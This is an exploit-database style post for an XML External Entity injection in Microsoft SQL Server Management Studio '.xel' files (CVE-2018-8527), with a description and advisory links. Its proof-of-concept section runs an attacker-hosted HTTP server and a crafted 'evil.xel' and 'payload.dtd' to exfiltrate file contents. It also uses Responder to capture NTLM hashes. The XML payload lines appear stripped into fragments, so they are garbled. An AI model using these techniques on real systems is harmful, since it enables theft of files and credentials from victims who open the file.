# Exploit Title: Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection # Date: 2018-10-10 # Author: John Page (aka hyp3rlinx) # Website: hyp3rlinx.altervista.org # Venodor: www.microsoft.com # Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4) # CVE: CVE-2018-8527 # References: # http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt # https://www.zerodayinitiative.com/advisories/ZDI-18-1131/ # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527 # The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527) # Description # This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations # of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability # in that the target must visit a malicious page or open a malicious file. # The specific flaw exists within the handling of XEL files. Due to the improper restriction # of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser # to access the URI and embed the contents back into the XML document for further processing. An attacker # can leverage this vulnerability to disclose information in the context of the current process. # [Exploit/POC] python -m SimpleHTTPServer (listens Port 8000) "evil.xel" (Extended Event Log File) %dtd;]> &send; "payload.dtd" "> %all; # OR # Steal NTLM hashes # Kali linux /usr/share/responder/tools responder -I eth0 -rv "evil.xel" %dtd;]> Result: Forced authentication and NTLM hash captured